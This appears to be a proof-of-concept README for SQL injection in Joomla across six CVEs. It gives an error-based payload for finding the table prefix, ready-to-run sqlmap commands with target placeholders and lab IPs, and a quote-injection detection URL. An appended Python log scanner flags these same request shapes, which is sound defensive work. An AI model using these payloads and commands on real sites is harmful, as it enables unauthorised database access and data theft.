# Joomla-SQLinjection PoC

0. CVE-2020-35613
1. CVE-2020-10243
2. CVE-2019-19846
3. CVE-2018-8045
4. CVE-2018-6376
5. CVE-2017-8917

# Payload to detect prefix table

## Step 1: Get hex value

`UpdateXML(2, concat(0x3a,(SELECT HEX(MID(TABLE_NAME,1,16)) FROM information_schema.tables WHERE TABLE_NAME LIKE 0x257573657273 LIMIT 1,1), 0x3a), 1)`

## Step 2: Convert hex to ASCII

- Linux command: `echo "<hex value>" | xxd -r -p`
- Link: https://www.rapidtables.com/convert/number/hex-to-ascii.html

## 5. CVE-2017-8917

### User requirement: None

### Detecting:

![image](https://user-images.githubusercontent.com/24661746/77494259-ddd35680-6e77-11ea-8331-106c89b48f7c.png)

### Sqlmap:

`sqlmap -u "[your target]/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=*" --dbms=mysql --technique=E --dbs`

### Example:

`sqlmap -u "http://192.168.119.128/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=*" --dbms=mysql --technique=E --dbs`

## 4. CVE-2018-6376

### User requirement: Manager (lowest level)

### Detecting:

![image](https://user-images.githubusercontent.com/24661746/77607304-73d8b100-6f4c-11ea-9c6b-72a56c55efda.png)

### Second-url:

![image](https://user-images.githubusercontent.com/24661746/77607359-a7b3d680-6f4c-11ea-9f66-78b24b5ee895.png)

## 3. CVE-2018-8045

### User requirement: Administrator

### Detecting:

![image](https://user-images.githubusercontent.com/24661746/77608547-25c5ac80-6f50-11ea-9495-b13b00448d1c.png)

## 2. CVE-2019-19846

### User requirement: Super Users

### Detecting:

...Update later...

## 1. CVE-2020-10243: SQL injection in Featured Articles menu parameters

Author: Sam Thomas, Pentest.co.uk

PoC by: Hoang Kien

### User requirement: admin (not superadmin)

### Type: Second-order SQL injection

### Detecting:

![image](https://user-images.githubusercontent.com/24661746/78954200-8d115e00-7b05-11ea-8cd1-0d605fff4101.png)

### Second-url:

![image](https://user-images.githubusercontent.com/24661746/78954286-d2ce2680-7b05-11ea-9ffb-ec1263618056.png)

### Exploit video:

https://vimeo.com/398763205

### Sqlmap:

`sqlmap -r sqli.joomla.req --level=5 --risk=3 -p "jform%5Bparams%5D%5Bfeatured_categories%5D%5B%5D" --dbms=mysql --second-url "[your domain/IP]/index.php" --technique=E --dbs`

### Example:

`sqlmap -r sqli.joomla.req --level=5 --risk=3 -p "jform%5Bparams%5D%5Bfeatured_categories%5D%5B%5D" --dbms=mysql --second-url "http://192.168.131.134:8080/index.php" --technique=E --dbs`

## 0. CVE-2020-35613: SQL injection in com_users list view

Author: ka1n4t

PoC by: Hoang Kien

### User requirement: admin (not superadmin)

### Detecting:

`[your domain/IP]/administrator/index.php?option=com_users&view=users&filter[excluded]='`

![image](https://user-images.githubusercontent.com/24661746/102855478-50994e80-4457-11eb-8d6a-efeb51b9ac96.png)

## References:

0. https://www.empressia.pl/blog/184-analiza-podatnosci-sql-injection-w-cms-joomla
1. https://pentest.co.uk/labs/advisory/cve-2020-10243/
2. https://xz.aliyun.com/t/6990
3. https://github.com/luckybool1020/CVE-2018-8045
4. https://www.notsosecure.com/analyzing-cve-2018-6376/
5. https://github.com/gottburgm/Exploits/tree/master/CVE-2017-8917
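The "Detecting" requests above (the `com_fields` `list[fullordering]` ordering parameter used for CVE-2017-8917, the `com_users` `filter[excluded]` parameter used for CVE-2020-35613, and the `UpdateXML()`/`information_schema` shape of the prefix-table payload) are exactly what a defender would hunt for in web server access logs after the fact. The following scanner is an added example for this page, not code from the Joomla-SQLinjection PoC repository or from Joomla; the log format, the rule names and every sample log line are constructed assumptions. Request-body parameters, such as the `jform[params][featured_categories][]` POST parameter used in the second-order CVE-2020-10243 case, do not appear in a standard access log, so this scanner does not cover them.

```python
"""Access-log hunt for the Joomla SQLi request shapes shown on this page.

Added example for this page; not code from the Joomla-SQLinjection PoC
repository or from Joomla. The log line format, the rule names and the
sample lines are assumptions / constructed data.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Apache combined-style access log line (constructed format assumption).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+'
)

# Error-based markers taken from the page's own payloads, plus the quote /
# parenthesis shapes that a legitimate ordering or filter value never needs.
SQL_SHAPE = re.compile(r"[()']|\b(updatexml|extractvalue|information_schema)\b", re.I)

# Constructed sample traffic: two suspicious requests, two benign ones.
SAMPLE_LOG = """\
10.0.0.5 - - [24/Mar/2020:10:01:02 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=UpdateXML(2,concat(0x3a,(SELECT%20HEX(MID(TABLE_NAME,1,16))%20FROM%20information_schema.tables%20LIMIT%201,1),0x3a),1) HTTP/1.1" 500 1234
10.0.0.5 - - [24/Mar/2020:10:01:05 +0000] "GET /administrator/index.php?option=com_users&view=users&filter[excluded]=%27 HTTP/1.1" 500 987
10.0.0.9 - - [24/Mar/2020:10:02:00 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=a.ordering%20ASC HTTP/1.1" 200 5120
10.0.0.7 - - [24/Mar/2020:10:03:00 +0000] "GET /index.php?option=com_content&view=article&id=1 HTTP/1.1" 200 8000
"""


def classify(target: str) -> list:
    """Return the names of the rules that a request target (path + query) trips."""
    parts = urlsplit(target)
    qs = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values once
    option = qs.get("option", [""])[0]
    hits = []
    # CVE-2017-8917 shape: com_fields ordering parameter carrying SQL.
    if option == "com_fields" and any(
        SQL_SHAPE.search(v) for v in qs.get("list[fullordering]", [])
    ):
        hits.append("CVE-2017-8917 com_fields list[fullordering]")
    # CVE-2020-35613 shape: com_users list view with a quoted filter[excluded].
    if (
        option == "com_users"
        and parts.path.endswith("/administrator/index.php")
        and any(SQL_SHAPE.search(v) for v in qs.get("filter[excluded]", []))
    ):
        hits.append("CVE-2020-35613 com_users filter[excluded]")
    # Generic: error-based extraction functions anywhere in the query string.
    if re.search(r"updatexml|extractvalue|information_schema", parts.query, re.I):
        hits.append("error-based SQLi marker in query")
    return hits


def scan_log(text: str) -> list:
    """Return (ip, status, target, hits) for every log line that trips a rule."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line: skip it rather than abort the hunt
        hits = classify(m["target"])
        if hits:
            findings.append((m["ip"], m["status"], m["target"], hits))
    return findings


if __name__ == "__main__":
    for ip, status, target, hits in scan_log(SAMPLE_LOG):
        print(f"{ip} {status} {target}\n    -> {', '.join(hits)}")
```

Legitimate Joomla ordering values such as `a.ordering ASC` carry no parentheses, quotes or MySQL function names, so they pass; the two constructed suspicious lines are flagged, and the HTTP status is kept in the output because an error-based probe commonly surfaces as a server error rather than a normal page.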